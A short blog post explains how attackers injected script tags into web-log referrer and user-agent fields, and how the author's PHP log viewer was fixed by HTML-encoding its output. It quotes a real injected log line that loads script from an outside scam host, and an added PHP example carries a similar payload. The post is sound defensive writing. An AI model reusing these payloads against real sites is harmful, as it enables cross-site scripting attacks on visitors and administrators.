JavaScript in Web Logs

Some time ago, I wrote a simple PHP utility that sits on a web server, concatenates a number of web logs and displays them in a browser to allow a quick inspection.  A simple task - no problem - but I hadn't allowed for hostile entities injecting JavaScript calls into the referrer and user agent fields of the log.

Here is a single line of the offending file, split into 3 lines for clarity, with '<' and '>' replaced by '{' and '}' to avoid viewing problems:

210.140.154.38 - - [02/Jan/2020:22:52:50 +0000] "GET /wp-admin HTTP/1.1" 418 453
"\"}{script type=text/javascript src='https://statistic.admarketlocation.com/hos?&tp=3'}{/script}"
"\"}{script type=text/javascript src='https://statistic.admarketlocation.com/hos?&tp=3'}{/script}"

The IP block is: 210.136.0.0 - 210.143.255.255, assigned to 'Japan Network Information Center, JP' and specifically, 210.140.154.38 is allocated to 'Yahoo Japan Corporation'.

After running a series of unwanted pages, Norton antivirus blocked the activity with the message: 'Web Attack: Fake Tech Support Website 295'.

(The HTTP status code of 418 is generated by the site's PHP pages and indicates that the page request has been rejected and has been replaced by a blank page.)

The problem was alleviated by using search and replace on the log files before they were displayed, replacing '<' with '&lt;' and '>' with '&gt;' - hence replacing the HTML chevrons with entities that the browser displays as chevrons but does not parse as markup.  Similarly, the two types of numeric HTML entity codes (decimal and hexadecimal) are not treated as tag delimiters by the HTML parser and are displayed as chevrons.  A friend - Robert Schifreen - suggested using the <pre> tag to bracket the log data, but this did not work, because the browser still parses tags inside <pre>, and Norton saved the day again.
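The vulnerable and corrected forms of such a log viewer, side by side, as an added example that is not the author's original utility. The function names, the placeholder host example.invalid and the sample log line are assumptions constructed for illustration; htmlspecialchars() stands in for the manual search and replace and also encodes '&' and quotes.

```php
<?php
// Added example: hypothetical helper names; the sample log line is constructed.
declare(strict_types=1);

/** Vulnerable form: log text is emitted as markup, so a script tag in the
 *  referrer or user-agent field is parsed by the viewer's browser,
 *  even though it sits inside <pre>. */
function render_logs_unsafe(array $lines): string
{
    return "<pre>\n" . implode("\n", $lines) . "\n</pre>";
}

/** Hardened form: every line is encoded for the HTML text context. */
function render_logs_safe(array $lines): string
{
    $out = [];
    foreach ($lines as $line) {
        // ENT_QUOTES also encodes ' and "; ENT_SUBSTITUTE replaces invalid
        // UTF-8 instead of returning an empty string for the whole line.
        $out[] = htmlspecialchars($line, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
    return "<pre>\n" . implode("\n", $out) . "\n</pre>";
}

// Constructed sample modelled on the entry above, with a placeholder host.
$payload = '"\"><script type=text/javascript src=\'https://example.invalid/x.js\'></script>"';
$sample = [
    '203.0.113.7 - - [02/Jan/2020:22:52:50 +0000] "GET /wp-admin HTTP/1.1" 418 453 '
    . $payload . ' ' . $payload,
];

if (PHP_SAPI !== 'cli') {
    // Defence in depth: the page may load no scripts at all, so a missed
    // encoding step still cannot execute anything.
    header("Content-Security-Policy: default-src 'none'");
    header('X-Content-Type-Options: nosniff');
    header('Content-Type: text/html; charset=UTF-8');
}

$safe = render_logs_safe($sample);
// Self-check: the only '<' characters left belong to the viewer's own
// <pre> and </pre>; everything from the log has become entities.
if (substr_count($safe, '<') !== 2) {
    throw new RuntimeException('unescaped markup in log output');
}
echo $safe, "\n";
```

Encoding at output time, rather than rewriting the log files themselves, keeps the original entries intact for later analysis.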

Motto - always sanitize data you send to a browser.

© January 2020, Keith Lockstone
